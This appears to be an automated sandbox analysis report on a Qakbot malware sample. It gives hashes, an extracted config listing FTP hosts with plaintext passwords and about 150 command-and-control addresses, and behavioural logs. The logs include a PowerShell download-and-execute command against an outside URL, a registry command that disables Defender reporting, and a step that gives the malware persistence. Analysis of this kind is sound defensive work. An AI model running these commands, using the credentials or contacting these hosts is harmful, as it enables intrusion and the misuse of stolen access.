Analysis
-
max time kernel
12s -
max time network
26s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
13-02-2022 22:36
Static task
static1
Behavioral task
behavioral1
Sample
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Resource
win10v2004-en-20220113
General
-
Target
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
-
Size
400KB
-
MD5
30f804952e82a4bf30c776402967850f
-
SHA1
6db90c30220e594b31366a24a53fdb55308a4357
-
SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
-
SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
322.148
1518695014
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
[email protected] - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
179.62.153.88:443
50.198.141.161:2222
69.129.91.38:443
66.189.228.49:995
96.253.104.73:443
71.183.129.113:443
125.25.130.203:995
173.175.174.154:443
162.104.186.175:995
75.109.222.140:995
68.173.55.51:443
78.175.254.43:443
106.159.251.143:995
47.143.83.172:443
71.190.202.120:443
73.136.232.174:995
96.253.104.73:995
192.158.217.32:22
65.153.16.250:993
70.95.129.59:443
105.225.253.101:443
216.93.143.182:995
71.41.141.206:443
69.129.91.38:32102
47.223.78.244:993
47.40.29.239:443
47.33.213.104:443
74.93.207.181:993
178.54.193.161:443
156.217.12.177:443
66.222.48.40:443
96.70.92.177:1194
74.95.207.214:990
47.221.46.163:443
65.73.215.139:990
198.0.111.129:443
70.117.246.103:443
96.253.104.73:50002
24.240.235.106:443
68.133.47.184:443
70.167.30.88:443
216.218.74.196:443
199.115.167.168:443
132.206.59.132:443
74.95.207.214:443
72.204.249.114:2222
87.243.32.159:443
76.0.178.104:443
189.155.221.97:993
209.212.131.66:443
78.158.195.141:995
47.201.56.21:443
65.40.207.151:995
47.149.85.238:443
104.231.199.203:443
69.193.199.50:443
74.84.15.214:443
174.66.86.206:443
190.137.200.166:443
216.201.159.118:443
99.196.254.46:443
73.126.4.33:443
68.5.211.85:443
50.42.189.206:993
78.182.109.227:443
98.103.2.226:443
75.127.141.50:995
65.100.49.186:465
12.161.77.98:443
109.75.195.157:443
76.27.69.75:443
70.94.109.57:443
65.153.16.250:995
50.195.161.2:995
98.216.56.48:443
47.22.21.180:995
67.83.122.112:2222
209.213.24.194:443
97.68.164.170:990
24.176.181.14:443
142.114.93.235:2222
75.83.30.135:443
68.50.161.232:443
31.206.147.0:995
24.119.224.202:2078
68.0.186.126:443
184.186.73.221:443
100.35.65.82:995
174.57.88.157:443
46.175.67.170:443
50.74.66.214:443
96.85.138.153:995
71.85.72.9:443
175.107.54.44:443
65.153.16.250:465
103.228.43.58:443
76.104.40.157:443
68.203.159.21:443
73.1.116.205:443
86.57.136.126:990
73.136.132.231:443
192.158.217.32:443
70.189.67.15:443
45.36.199.50:443
186.107.214.4:443
173.49.95.92:443
203.109.206.203:465
73.198.142.130:995
174.58.149.247:443
98.74.157.85:443
73.206.97.214:443
104.33.67.39:443
135.84.195.154:995
189.155.221.97:995
73.182.163.200:443
50.73.23.181:995
74.95.207.214:995
73.93.154.150:443
186.109.26.149:443
65.100.49.186:443
74.95.207.214:465
74.69.244.255:443
68.83.130.163:443
73.77.17.146:443
108.58.129.90:443
74.42.21.175:995
49.151.84.2:443
108.35.28.73:443
98.218.243.27:443
76.177.73.90:995
71.41.225.171:443
24.187.255.116:443
24.223.103.6:443
74.95.207.214:993
76.95.241.114:443
69.41.8.88:443
23.240.50.137:443
47.201.138.241:443
69.132.80.73:443
68.198.107.62:2222
65.33.119.17:443
50.244.177.253:443
65.100.49.186:995
12.166.108.82:995
108.58.129.90:995
187.138.102.154:443
65.100.49.186:2222
50.44.111.101:443
170.231.89.56:2222
108.27.217.183:443
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 25 2992 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
wivbvi.exewivbvi.exepid process 2928 wivbvi.exe 3772 wivbvi.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hwzjp = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Wivbvii\\wivbvi.exe\"" explorer.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 wivbvi.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc wivbvi.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service wivbvi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wivbvi.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wivbvi.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wivbvi.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exepowershell.exewivbvi.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exepid process 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 3904 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 3904 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 3904 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 3904 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 2928 wivbvi.exe 2928 wivbvi.exe 2992 powershell.exe 2992 powershell.exe 3772 wivbvi.exe 3772 wivbvi.exe 3772 wivbvi.exe 3772 wivbvi.exe 824 explorer.exe 824 explorer.exe 2340 sihost.exe 2340 sihost.exe 824 explorer.exe 824 explorer.exe 2380 svchost.exe 2380 svchost.exe 2476 taskhostw.exe 2476 taskhostw.exe 2416 Explorer.EXE 2416 Explorer.EXE 2872 svchost.exe 2872 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
wivbvi.exepid process 2928 wivbvi.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
svchost.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2812 svchost.exe Token: SeCreatePagefilePrivilege 2812 svchost.exe Token: SeShutdownPrivilege 2812 svchost.exe Token: SeCreatePagefilePrivilege 2812 svchost.exe Token: SeShutdownPrivilege 2812 svchost.exe Token: SeCreatePagefilePrivilege 2812 svchost.exe Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exewivbvi.exeexplorer.execmd.exedescription pid process target process PID 2244 wrote to memory of 3904 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 2244 wrote to memory of 3904 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 2244 wrote to memory of 3904 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe PID 2244 wrote to memory of 2928 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe wivbvi.exe PID 2244 wrote to memory of 2928 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe wivbvi.exe PID 2244 wrote to memory of 2928 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe wivbvi.exe PID 2244 wrote to memory of 1568 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 2244 wrote to memory of 1568 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe reg.exe PID 2244 wrote to memory of 2992 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 2244 wrote to memory of 2992 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe powershell.exe PID 2928 wrote to memory of 3772 2928 wivbvi.exe wivbvi.exe PID 2928 wrote to memory of 3772 2928 wivbvi.exe wivbvi.exe PID 2928 wrote to memory of 3772 2928 wivbvi.exe wivbvi.exe PID 2928 wrote to memory of 824 2928 wivbvi.exe explorer.exe PID 2928 wrote to memory of 824 2928 wivbvi.exe explorer.exe PID 2928 wrote to memory of 824 2928 wivbvi.exe explorer.exe PID 2928 wrote to memory of 824 2928 wivbvi.exe explorer.exe PID 824 wrote to memory of 2340 824 explorer.exe sihost.exe PID 824 wrote to memory of 2340 824 explorer.exe sihost.exe PID 824 wrote to memory of 2340 824 explorer.exe sihost.exe PID 2244 wrote to memory of 828 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 2244 wrote to memory of 828 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 2244 wrote to memory of 828 2244 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe cmd.exe PID 828 wrote to memory of 4724 828 cmd.exe PING.EXE PID 828 wrote to memory of 4724 828 cmd.exe PING.EXE PID 828 wrote to memory of 4724 828 cmd.exe PING.EXE PID 824 wrote to memory of 2380 824 explorer.exe svchost.exe PID 824 wrote to memory of 2380 824 explorer.exe svchost.exe PID 824 wrote to memory of 2380 824 explorer.exe svchost.exe PID 824 wrote to memory of 2476 824 explorer.exe taskhostw.exe PID 824 wrote to memory of 2476 824 explorer.exe taskhostw.exe PID 824 wrote to memory of 2476 824 explorer.exe taskhostw.exe PID 824 wrote to memory of 2416 824 explorer.exe Explorer.EXE PID 824 wrote to memory of 2416 824 explorer.exe Explorer.EXE PID 824 wrote to memory of 2416 824 explorer.exe Explorer.EXE PID 824 wrote to memory of 2872 824 explorer.exe svchost.exe PID 824 wrote to memory of 2872 824 explorer.exe svchost.exe PID 824 wrote to memory of 2872 824 explorer.exe svchost.exe PID 824 wrote to memory of 3268 824 explorer.exe DllHost.exe PID 824 wrote to memory of 3268 824 explorer.exe DllHost.exe PID 824 wrote to memory of 3268 824 explorer.exe DllHost.exe
Processes
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe" /C3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exeC:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exe" /C4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jyxynixbqdlzigozpybqeaxqoow.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbv.datMD5
56e49376af78bd72413e65733e7dc965
SHA1a14b8bc92f924ee21212b494265edccb998e0c59
SHA25611c93ce74a900510ec6cf481f2f4713b310b5c4baa2a7b85c18df68f28729abb
SHA512cf0f3ec557e446964ef099e9d051297c673ea9a0f3528cd7084ec84aef56d276a6892a9efa2af4dc97a503fec2dc5e17ae2c7c5b75309024f8ddc33f55cb765b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Wivbvii\wivbvi.exeMD5
30f804952e82a4bf30c776402967850f
SHA16db90c30220e594b31366a24a53fdb55308a4357
SHA256058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92
-
memory/824-142-0x0000000000830000-0x0000000000898000-memory.dmpFilesize
416KB
-
memory/824-153-0x0000000002B30000-0x0000000002B31000-memory.dmpFilesize
4KB
-
memory/824-150-0x0000000002B90000-0x0000000002B91000-memory.dmpFilesize
4KB
-
memory/824-156-0x0000000002B60000-0x0000000002B61000-memory.dmpFilesize
4KB
-
memory/824-147-0x0000000002AD0000-0x0000000002AFF000-memory.dmpFilesize
188KB
-
memory/824-143-0x00000000024B0000-0x00000000024B1000-memory.dmpFilesize
4KB
-
memory/824-144-0x0000000002B00000-0x0000000002B01000-memory.dmpFilesize
4KB
-
memory/2340-148-0x00007FFD1F90D000-0x00007FFD1F90E000-memory.dmpFilesize
4KB
-
memory/2340-149-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmpFilesize
4KB
-
memory/2340-145-0x0000000000DF0000-0x0000000000DF1000-memory.dmpFilesize
4KB
-
memory/2340-146-0x0000000000D90000-0x0000000000DBC000-memory.dmpFilesize
176KB
-
memory/2380-155-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmpFilesize
4KB
-
memory/2380-154-0x0000000000990000-0x00000000009BC000-memory.dmpFilesize
176KB
-
memory/2416-151-0x0000000002860000-0x000000000288C000-memory.dmpFilesize
176KB
-
memory/2416-152-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmpFilesize
4KB
-
memory/2476-157-0x0000000000DE0000-0x0000000000E0C000-memory.dmpFilesize
176KB
-
memory/2476-158-0x00007FFD1F860000-0x00007FFD1F861000-memory.dmpFilesize
4KB
-
memory/2812-130-0x000001C2F2730000-0x000001C2F2740000-memory.dmpFilesize
64KB
-
memory/2812-132-0x000001C2F5480000-0x000001C2F5484000-memory.dmpFilesize
16KB
-
memory/2812-131-0x000001C2F2790000-0x000001C2F27A0000-memory.dmpFilesize
64KB
-
memory/2992-139-0x000001F879436000-0x000001F879438000-memory.dmpFilesize
8KB
-
memory/2992-137-0x000001F879433000-0x000001F879435000-memory.dmpFilesize
8KB
-
memory/2992-138-0x000001F879570000-0x000001F879592000-memory.dmpFilesize
136KB
-
memory/2992-135-0x000001F878483000-0x000001F878485000-memory.dmpFilesize
8KB
-
memory/2992-136-0x000001F879430000-0x000001F879432000-memory.dmpFilesize
8KB